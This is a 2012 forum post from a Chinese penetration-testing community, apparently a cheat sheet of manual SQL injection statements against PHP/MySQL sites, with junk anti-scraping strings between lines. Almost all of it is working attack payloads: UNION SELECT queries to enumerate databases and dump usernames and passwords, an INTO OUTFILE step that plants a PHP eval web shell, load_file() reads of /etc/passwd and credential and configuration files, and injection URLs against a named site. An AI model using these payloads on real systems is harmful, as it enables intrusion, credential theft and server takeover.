中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
* f' G2 L; ]. q0 {5 h
" g+ C& {8 H- l l" ^
暴字段长度
; y: z; A. m/ {0 y* \
Order by num/*
- S3 ]6 d' h, ~4 t1 a
匹配字段
/ n- U' `) v' R7 Q9 v
and 1=1 union select 1,2,3,4,5…….n/*
# m8 p6 s( |- V4 n( l( s
暴字段位置
" _4 b) ]& o5 o% m
and 1=2 union select 1,2,3,4,5…..n/*
. T' U* Z& S! @! h$ H- Z2 ~
利用内置函数暴数据库信息
% D; g# G. l; y4 A4 M; v! D
version() database() user()
- a* Z$ Y9 b/ `9 @
不用猜解可用字段暴数据库信息(有些网站不适用):
8 D+ k" F& {9 ]' ?8 a a0 b P! J' A
and 1=2 union all select version() /*
) r. c- H$ o5 S* y
and 1=2 union all select database() /*
0 k% P, `1 `! I1 Q( G! v" p/ P+ r4 m
and 1=2 union all select user() /*
: a% f0 d4 _0 U; B) Y# H# M
操作系统信息:
/ U+ z5 r: x& F
and 1=2 union all select @@global.version_compile_os from mysql.user /*
6 R7 K' j) M) P
数据库权限:
* H+ }; w) R V( S& ]- z7 [
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
/ ~5 D9 ^1 @* Q# p3 S6 k4 M
暴库 (mysql>5.0)
8 _4 S; |' S o6 m8 O8 |3 T
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
( [7 H+ A% s2 j/ y) U4 a
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
! T$ N0 r2 G" t7 p: B" Q# r M
猜表
: ^( G7 f9 p: @5 v; b1 N
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
/ p' v$ T( j5 H
猜字段
6 H/ q5 |7 ^) N) z
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
9 X8 o; J- g& _" ^$ q
暴密码
9 g5 D& H2 Z% h1 c: Q( }$ R
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
( G. [, j3 M) U5 U6 j$ r
高级用法(一个可用字段显示两个数据内容):
) h ~7 ]$ m& D0 d: R2 N
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
6 [' R* n: O. ]! N/ o; S6 o4 U
直接写马(Root权限)
$ O$ y$ V! n4 K' C6 v; E/ B
条件:1、知道站点物理路径
' U/ R1 J; Z; U' K4 T, u# [ M; n
2、有足够大的权限(可以用select …. from mysql.user测试)
# m3 R9 |) l8 c$ l
3、magic_quotes_gpc()=OFF
) Z8 S, @1 e. |2 I: ?9 g0 B; _
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
) A3 M% u) J6 I/ }
and 1=2 union all select 一句话HEX值 into outfile '路径'
9 ?- }7 O5 S3 X3 m2 I1 D
load_file() 常用路径:
7 p2 k' t; D+ J
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
$ R" r9 G* I5 U4 g
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
: {8 W# C! b8 r4 o
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
& Q/ s* q ~" ]6 {0 L- c
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
8 q% u- O+ D% f! B, [ n3 \0 ]
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
9 ^4 E- n1 N5 } H) V
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
3 N W1 t- L' C
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
/ ^. L q% C1 a! N( @; \
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
, ^; U0 X6 z' w. k+ r
8、d:\APACHE\Apache2\conf\httpd.conf
+ K( F# y% U& I% c4 P' U8 W
9、C:\Program Files\mysql\my.ini
; v. e) H# L+ w) Q, _+ h' y. z
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
. y& i& V8 @" ^$ k8 m
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
* n) m2 B8 e( g. n! p& K
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
, a# J) V6 G5 f! d N3 E1 R; F5 L1 S
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
' R7 l! y$ I/ S8 \0 s
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
$ F2 t8 b; k, M& E$ {( F
15、 /etc/sysconfig/iptables 本看防火墙策略
7 t9 Q' J* Z: Y3 D9 Y% G
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
# w! k: w- I! o1 d5 w! N
17 、/etc/my.cnf MYSQL的配置文件
, N; Z* |9 S0 X/ k4 f y' f4 s" z
18、 /etc/redhat-release 红帽子的系统版本
7 c0 m3 E' ?8 ~6 V3 b6 @! r
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
7 b5 j$ }# H! D3 D0 B) a. O
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
$ s3 J: f7 R W8 b9 P2 ?
21、/usr/local/app/php5 b/php.ini //PHP相关设置
7 t+ z, q4 J2 P) I
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
, @. |8 x; K% Q! s' W
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
: i; Y) `7 d. ?3 [8 z3 B+ y( S
24、c:\windows\my.ini
3 V2 \! E1 \. L5 ~1 n/ W
25、c:\boot.ini
: A* d0 G* T9 [6 T' l! d9 n
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
2 y3 h$ {6 i: A, \1 S1 N& [
注:
2 v8 x: ^2 @* r( C: \& x; E
Char(60)表示 <
) v! y/ M9 p! w4 q
Char(32)表示 空格
; ? r5 V/ u/ l8 H; v& F7 l
手工注射时出现的问题:
+ I0 @! J2 _" I# y8 _5 m
当注射后页面显示:
+ l1 C; z: M2 t9 c B3 i
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
0 i+ Z4 M n8 C
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
+ c1 v# J- L8 o- a& X
这是由于前后编码不一致造成的,
3 C6 S9 s# M4 f! p# z
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
& X2 N' g& ~/ _
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
( {9 `2 x( g1 M9 S3 u
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2